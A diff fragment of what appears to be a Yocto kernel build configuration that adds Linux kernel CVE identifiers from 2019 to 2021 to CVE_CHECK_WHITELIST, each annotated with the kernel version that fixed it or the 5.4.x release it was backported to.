+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19815"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19816"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19922"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19927"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19947"
+
+# cpe-stable-backport: Backported in 5.4.9
+CVE_CHECK_WHITELIST += "CVE-2019-19965"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19966"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-1999"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-20054"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-20095"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-20096"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2024"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2019-2025"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-20422"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2054"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-20636"
+
+# CVE-2019-20794 has no known resolution
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-20806"
+
+# cpe-stable-backport: Backported in 5.4.48
+CVE_CHECK_WHITELIST += "CVE-2019-20810"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-20811"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-20812"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-20908"
+
+# fixed-version: Fixed after version 5.3rc2
+CVE_CHECK_WHITELIST += "CVE-2019-20934"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2101"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2181"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2019-2182"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-2213"
+
+# fixed-version: Fixed after version 5.3rc2
+CVE_CHECK_WHITELIST += "CVE-2019-2214"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2215"
+
+# fixed-version: Fixed after version 5.2rc4
+CVE_CHECK_WHITELIST += "CVE-2019-25044"
+
+# fixed-version: Fixed after version 5.1
+CVE_CHECK_WHITELIST += "CVE-2019-25045"
+
+# fixed-version: Fixed after version 5.0
+CVE_CHECK_WHITELIST += "CVE-2019-25160"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2019-25162"
+
+# cpe-stable-backport: Backported in 5.4.19
+CVE_CHECK_WHITELIST += "CVE-2019-3016"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3459"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3460"
+
+# fixed-version: Fixed after version 5.0rc3
+CVE_CHECK_WHITELIST += "CVE-2019-3701"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-3819"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3837"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-3846"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3874"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-3882"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-3887"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-3892"
+
+# fixed-version: Fixed after version 2.6.35rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3896"
+
+# fixed-version: Fixed after version 5.2rc4
+CVE_CHECK_WHITELIST += "CVE-2019-3900"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2019-3901"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-5108"
+
+# Skipping CVE-2019-5489, no affected_versions
+
+# fixed-version: Fixed after version 5.0rc2
+CVE_CHECK_WHITELIST += "CVE-2019-6133"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-6974"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-7221"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-7222"
+
+# fixed-version: Fixed after version 5.0rc3
+CVE_CHECK_WHITELIST += "CVE-2019-7308"
+
+# fixed-version: Fixed after version 5.0rc8
+CVE_CHECK_WHITELIST += "CVE-2019-8912"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-8956"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-8980"
+
+# fixed-version: Fixed after version 5.0rc4
+CVE_CHECK_WHITELIST += "CVE-2019-9003"
+
+# fixed-version: Fixed after version 5.0rc7
+CVE_CHECK_WHITELIST += "CVE-2019-9162"
+
+# fixed-version: Fixed after version 5.0
+CVE_CHECK_WHITELIST += "CVE-2019-9213"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9245"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2019-9444"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9445"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9453"
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2019-9454"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9455"
+
+# fixed-version: Fixed after version 4.16rc6
+CVE_CHECK_WHITELIST += "CVE-2019-9456"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9457"
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2019-9458"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9466"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9500"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9503"
+
+# fixed-version: Fixed after version 5.2
+CVE_CHECK_WHITELIST += "CVE-2019-9506"
+
+# fixed-version: Fixed after version 5.1rc2
+CVE_CHECK_WHITELIST += "CVE-2019-9857"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-0009"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2020-0030"
+
+# cpe-stable-backport: Backported in 5.4.4
+CVE_CHECK_WHITELIST += "CVE-2020-0041"
+
+# fixed-version: Fixed after version 4.3rc7
+CVE_CHECK_WHITELIST += "CVE-2020-0066"
+
+# cpe-stable-backport: Backported in 5.4.36
+CVE_CHECK_WHITELIST += "CVE-2020-0067"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-0110"
+
+# cpe-stable-backport: Backported in 5.4.39
+CVE_CHECK_WHITELIST += "CVE-2020-0255"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2020-0305"
+
+# CVE-2020-0347 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.19
+CVE_CHECK_WHITELIST += "CVE-2020-0404"
+
+# cpe-stable-backport: Backported in 5.4.73
+CVE_CHECK_WHITELIST += "CVE-2020-0423"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2020-0427"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2020-0429"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2020-0430"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2020-0431"
+
+# cpe-stable-backport: Backported in 5.4.17
+CVE_CHECK_WHITELIST += "CVE-2020-0432"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2020-0433"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2020-0435"
+
+# cpe-stable-backport: Backported in 5.4.24
+CVE_CHECK_WHITELIST += "CVE-2020-0444"
+
+# cpe-stable-backport: Backported in 5.4.63
+CVE_CHECK_WHITELIST += "CVE-2020-0465"
+
+# cpe-stable-backport: Backported in 5.4.61
+CVE_CHECK_WHITELIST += "CVE-2020-0466"
+
+# cpe-stable-backport: Backported in 5.4.46
+CVE_CHECK_WHITELIST += "CVE-2020-0543"
+
+# cpe-stable-backport: Backported in 5.4.72
+CVE_CHECK_WHITELIST += "CVE-2020-10135"
+
+# cpe-stable-backport: Backported in 5.4.8
+CVE_CHECK_WHITELIST += "CVE-2020-10690"
+
+# CVE-2020-10708 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.42
+CVE_CHECK_WHITELIST += "CVE-2020-10711"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2020-10720"
+
+# cpe-stable-backport: Backported in 5.4.44
+CVE_CHECK_WHITELIST += "CVE-2020-10732"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2020-10742"
+
+# cpe-stable-backport: Backported in 5.4.39
+CVE_CHECK_WHITELIST += "CVE-2020-10751"
+
+# cpe-stable-backport: Backported in 5.4.45
+CVE_CHECK_WHITELIST += "CVE-2020-10757"
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2020-10766"
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2020-10767"
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2020-10768"
+
+# fixed-version: Fixed after version 5.0rc3
+CVE_CHECK_WHITELIST += "CVE-2020-10769"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2020-10773"
+
+# CVE-2020-10774 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.53
+CVE_CHECK_WHITELIST += "CVE-2020-10781"
+
+# cpe-stable-backport: Backported in 5.4.24
+CVE_CHECK_WHITELIST += "CVE-2020-10942"
+
+# cpe-stable-backport: Backported in 5.4.32
+CVE_CHECK_WHITELIST += "CVE-2020-11494"
+
+# cpe-stable-backport: Backported in 5.4.31
+CVE_CHECK_WHITELIST += "CVE-2020-11565"
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2020-11608"
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2020-11609"
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2020-11668"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2020-11669"
+
+# CVE-2020-11725 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.36
+CVE_CHECK_WHITELIST += "CVE-2020-11884"
+
+# CVE-2020-11935 has no known resolution
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2020-12114"
+
+# cpe-stable-backport: Backported in 5.4.72
+CVE_CHECK_WHITELIST += "CVE-2020-12351"
+
+# cpe-stable-backport: Backported in 5.4.72
+CVE_CHECK_WHITELIST += "CVE-2020-12352"
+
+# CVE-2020-12362 needs backporting (fixed from 5.11rc1)
+
+# CVE-2020-12363 needs backporting (fixed from 5.11rc1)
+
+# CVE-2020-12364 needs backporting (fixed from 5.11rc1)
+
+# cpe-stable-backport: Backported in 5.4.36
+CVE_CHECK_WHITELIST += "CVE-2020-12464"
+
+# cpe-stable-backport: Backported in 5.4.26
+CVE_CHECK_WHITELIST += "CVE-2020-12465"
+
+# cpe-stable-backport: Backported in 5.4.14
+CVE_CHECK_WHITELIST += "CVE-2020-12652"
+
+# cpe-stable-backport: Backported in 5.4.20
+CVE_CHECK_WHITELIST += "CVE-2020-12653"
+
+# cpe-stable-backport: Backported in 5.4.20
+CVE_CHECK_WHITELIST += "CVE-2020-12654"
+
+# cpe-stable-backport: Backported in 5.4.50
+CVE_CHECK_WHITELIST += "CVE-2020-12655"
+
+# cpe-stable-backport: Backported in 5.4.56
+CVE_CHECK_WHITELIST += "CVE-2020-12656"
+
+# cpe-stable-backport: Backported in 5.4.33
+CVE_CHECK_WHITELIST += "CVE-2020-12657"
+
+# cpe-stable-backport: Backported in 5.4.35
+CVE_CHECK_WHITELIST += "CVE-2020-12659"
+
+# cpe-stable-backport: Backported in 5.4.43
+CVE_CHECK_WHITELIST += "CVE-2020-12768"
+
+# cpe-stable-backport: Backported in 5.4.17
+CVE_CHECK_WHITELIST += "CVE-2020-12769"
+
+# cpe-stable-backport: Backported in 5.4.42
+CVE_CHECK_WHITELIST += "CVE-2020-12770"
+
+# cpe-stable-backport: Backported in 5.4.49
+CVE_CHECK_WHITELIST += "CVE-2020-12771"
+
+# cpe-stable-backport: Backported in 5.4.33
+CVE_CHECK_WHITELIST += "CVE-2020-12826"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-12888"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-12912"
+
+# cpe-stable-backport: Backported in 5.4.42
+CVE_CHECK_WHITELIST += "CVE-2020-13143"
+
+# cpe-stable-backport: Backported in 5.4.46
+CVE_CHECK_WHITELIST += "CVE-2020-13974"
+
+# CVE-2020-14304 has no known resolution
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2020-14305"
+
+# cpe-stable-backport: Backported in 5.4.61
+CVE_CHECK_WHITELIST += "CVE-2020-14314"
+
+# cpe-stable-backport: Backported in 5.4.58
+CVE_CHECK_WHITELIST += "CVE-2020-14331"
+
+# cpe-stable-backport: Backported in 5.4.78
+CVE_CHECK_WHITELIST += "CVE-2020-14351"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2020-14353"
+
+# cpe-stable-backport: Backported in 5.4.53
+CVE_CHECK_WHITELIST += "CVE-2020-14356"
+
+# cpe-stable-backport: Backported in 5.4.28
+CVE_CHECK_WHITELIST += "CVE-2020-14381"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-14385"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-14386"
+
+# cpe-stable-backport: Backported in 5.4.66
+CVE_CHECK_WHITELIST += "CVE-2020-14390"
+
+# cpe-stable-backport: Backported in 5.4.16
+CVE_CHECK_WHITELIST += "CVE-2020-14416"
+
+# cpe-stable-backport: Backported in 5.4.51
+CVE_CHECK_WHITELIST += "CVE-2020-15393"
+
+# cpe-stable-backport: Backported in 5.4.49
+CVE_CHECK_WHITELIST += "CVE-2020-15436"
+
+# cpe-stable-backport: Backported in 5.4.54
+CVE_CHECK_WHITELIST += "CVE-2020-15437"
+
+# cpe-stable-backport: Backported in 5.4.50
+CVE_CHECK_WHITELIST += "CVE-2020-15780"
+
+# CVE-2020-15802 has no known resolution
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-15852"
+
+# cpe-stable-backport: Backported in 5.4.148
+CVE_CHECK_WHITELIST += "CVE-2020-16119"
+
+# CVE-2020-16120 needs backporting (fixed from 5.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.57
+CVE_CHECK_WHITELIST += "CVE-2020-16166"
+
+# cpe-stable-backport: Backported in 5.4.5
+CVE_CHECK_WHITELIST += "CVE-2020-1749"
+
+# cpe-stable-backport: Backported in 5.4.51
+CVE_CHECK_WHITELIST += "CVE-2020-24394"
+
+# cpe-stable-backport: Backported in 5.4.56
+CVE_CHECK_WHITELIST += "CVE-2020-24490"
+
+# CVE-2020-24502 has no known resolution
+
+# CVE-2020-24503 has no known resolution
+
+# CVE-2020-24504 needs backporting (fixed from 5.12rc1)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-24586"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-24587"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-24588"
+
+# cpe-stable-backport: Backported in 5.4.70
+CVE_CHECK_WHITELIST += "CVE-2020-25211"
+
+# cpe-stable-backport: Backported in 5.4.60
+CVE_CHECK_WHITELIST += "CVE-2020-25212"
+
+# CVE-2020-25220 has no known resolution
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-25221"
+
+# cpe-stable-backport: Backported in 5.4.66
+CVE_CHECK_WHITELIST += "CVE-2020-25284"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-25285"
+
+# cpe-stable-backport: Backported in 5.4.102
+CVE_CHECK_WHITELIST += "CVE-2020-25639"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-25641"
+
+# cpe-stable-backport: Backported in 5.4.68
+CVE_CHECK_WHITELIST += "CVE-2020-25643"
+
+# cpe-stable-backport: Backported in 5.4.68
+CVE_CHECK_WHITELIST += "CVE-2020-25645"
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-25656"
+
+# CVE-2020-25661 has no known resolution
+
+# CVE-2020-25662 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-25668"
+
+# cpe-stable-backport: Backported in 5.4.79
+CVE_CHECK_WHITELIST += "CVE-2020-25669"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2020-25670"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2020-25671"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2020-25672"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2020-25673"
+
+# cpe-stable-backport: Backported in 5.4.76
+CVE_CHECK_WHITELIST += "CVE-2020-25704"
+
+# cpe-stable-backport: Backported in 5.4.73
+CVE_CHECK_WHITELIST += "CVE-2020-25705"
+
+# cpe-stable-backport: Backported in 5.4.59
+CVE_CHECK_WHITELIST += "CVE-2020-26088"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-26139"
+
+# CVE-2020-26140 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-26141"
+
+# CVE-2020-26142 has no known resolution
+
+# CVE-2020-26143 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-26145"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-26147"
+
+# cpe-stable-backport: Backported in 5.4.129
+CVE_CHECK_WHITELIST += "CVE-2020-26541"
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2020-26555"
+
+# CVE-2020-26556 has no known resolution
+
+# CVE-2020-26557 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2020-26558"
+
+# CVE-2020-26559 has no known resolution
+
+# CVE-2020-26560 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2020-27066"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2020-27067"
+
+# cpe-stable-backport: Backported in 5.4.24
+CVE_CHECK_WHITELIST += "CVE-2020-27068"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-27152"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-27170"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-27171"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-27194"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-2732"
+
+# cpe-stable-backport: Backported in 5.4.25
+CVE_CHECK_WHITELIST += "CVE-2020-27418"
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-27673"
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-27675"
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-27777"
+
+# cpe-stable-backport: Backported in 5.4.73
+CVE_CHECK_WHITELIST += "CVE-2020-27784"
+
+# cpe-stable-backport: Backported in 5.4.42
+CVE_CHECK_WHITELIST += "CVE-2020-27786"
+
+# cpe-stable-backport: Backported in 5.4.86
+CVE_CHECK_WHITELIST += "CVE-2020-27815"
+
+# cpe-stable-backport: Backported in 5.4.162
+CVE_CHECK_WHITELIST += "CVE-2020-27820"
+
+# cpe-stable-backport: Backported in 5.4.94
+CVE_CHECK_WHITELIST += "CVE-2020-27825"
+
+# cpe-stable-backport: Backported in 5.4.83
+CVE_CHECK_WHITELIST += "CVE-2020-27830"
+
+# CVE-2020-27835 needs backporting (fixed from 5.10rc6)
+
+# cpe-stable-backport: Backported in 5.4.66
+CVE_CHECK_WHITELIST += "CVE-2020-28097"
+
+# cpe-stable-backport: Backported in 5.4.89
+CVE_CHECK_WHITELIST += "CVE-2020-28374"
+
+# cpe-stable-backport: Backported in 5.4.83
+CVE_CHECK_WHITELIST += "CVE-2020-28588"
+
+# cpe-stable-backport: Backported in 5.4.71
+CVE_CHECK_WHITELIST += "CVE-2020-28915"
+
+# cpe-stable-backport: Backported in 5.4.80
+CVE_CHECK_WHITELIST += "CVE-2020-28941"
+
+# cpe-stable-backport: Backported in 5.4.76
+CVE_CHECK_WHITELIST += "CVE-2020-28974"
+
+# cpe-stable-backport: Backported in 5.4.48
+CVE_CHECK_WHITELIST += "CVE-2020-29368"
+
+# cpe-stable-backport: Backported in 5.4.54
+CVE_CHECK_WHITELIST += "CVE-2020-29369"
+
+# cpe-stable-backport: Backported in 5.4.27
+CVE_CHECK_WHITELIST += "CVE-2020-29370"
+
+# cpe-stable-backport: Backported in 5.4.61
+CVE_CHECK_WHITELIST += "CVE-2020-29371"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-29372"
+
+# CVE-2020-29373 needs backporting (fixed from 5.6rc2)
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2020-29374"
+
+# CVE-2020-29534 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.86
+CVE_CHECK_WHITELIST += "CVE-2020-29568"
+
+# cpe-stable-backport: Backported in 5.4.86
+CVE_CHECK_WHITELIST += "CVE-2020-29569"
+
+# cpe-stable-backport: Backported in 5.4.83
+CVE_CHECK_WHITELIST += "CVE-2020-29660"
+
+# cpe-stable-backport: Backported in 5.4.83
+CVE_CHECK_WHITELIST += "CVE-2020-29661"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-35499"
+
+# CVE-2020-35501 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.76
+CVE_CHECK_WHITELIST += "CVE-2020-35508"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2020-35513"
+
+# cpe-stable-backport: Backported in 5.4.82
+CVE_CHECK_WHITELIST += "CVE-2020-35519"
+
+# cpe-stable-backport: Backported in 5.4.88
+CVE_CHECK_WHITELIST += "CVE-2020-36158"
+
+# CVE-2020-36310 needs backporting (fixed from 5.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.131
+CVE_CHECK_WHITELIST += "CVE-2020-36311"
+
+# cpe-stable-backport: Backported in 5.4.66
+CVE_CHECK_WHITELIST += "CVE-2020-36312"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36313"
+
+# cpe-stable-backport: Backported in 5.4.88
+CVE_CHECK_WHITELIST += "CVE-2020-36322"
+
+# CVE-2020-36385 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.58
+CVE_CHECK_WHITELIST += "CVE-2020-36386"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36387"
+
+# cpe-stable-backport: Backported in 5.4.176
+CVE_CHECK_WHITELIST += "CVE-2020-36516"
+
+# cpe-stable-backport: Backported in 5.4.30
+CVE_CHECK_WHITELIST += "CVE-2020-36557"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-36558"
+
+# CVE-2020-36691 needs backporting (fixed from 5.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.86
+CVE_CHECK_WHITELIST += "CVE-2020-36694"
+
+# cpe-stable-backport: Backported in 5.4.62
+CVE_CHECK_WHITELIST += "CVE-2020-36766"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2020-36775"
+
+# fixed-version: only affects 5.8rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36776"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2020-36777"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36778"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36779"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2020-36780"
+
+# CVE-2020-36781 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2020-36782"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2020-36783"
+
+# CVE-2020-36784 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36785"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36786"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2020-36787"
+
+# cpe-stable-backport: Backported in 5.4.143
+CVE_CHECK_WHITELIST += "CVE-2020-3702"
+
+# cpe-stable-backport: Backported in 5.4.79
+CVE_CHECK_WHITELIST += "CVE-2020-4788"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2020-7053"
+
+# cpe-stable-backport: Backported in 5.4.16
+CVE_CHECK_WHITELIST += "CVE-2020-8428"
+
+# cpe-stable-backport: Backported in 5.4.25
+CVE_CHECK_WHITELIST += "CVE-2020-8647"
+
+# cpe-stable-backport: Backported in 5.4.25
+CVE_CHECK_WHITELIST += "CVE-2020-8648"
+
+# cpe-stable-backport: Backported in 5.4.25
+CVE_CHECK_WHITELIST += "CVE-2020-8649"
+
+# cpe-stable-backport: Backported in 5.4.77
+CVE_CHECK_WHITELIST += "CVE-2020-8694"
+
+# CVE-2020-8832 has no known resolution
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2020-8834"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-8835"
+
+# cpe-stable-backport: Backported in 5.4.21
+CVE_CHECK_WHITELIST += "CVE-2020-8992"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-9383"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-9391"
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2021-0129"
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2021-0342"
+
+# CVE-2021-0399 has no known resolution
+
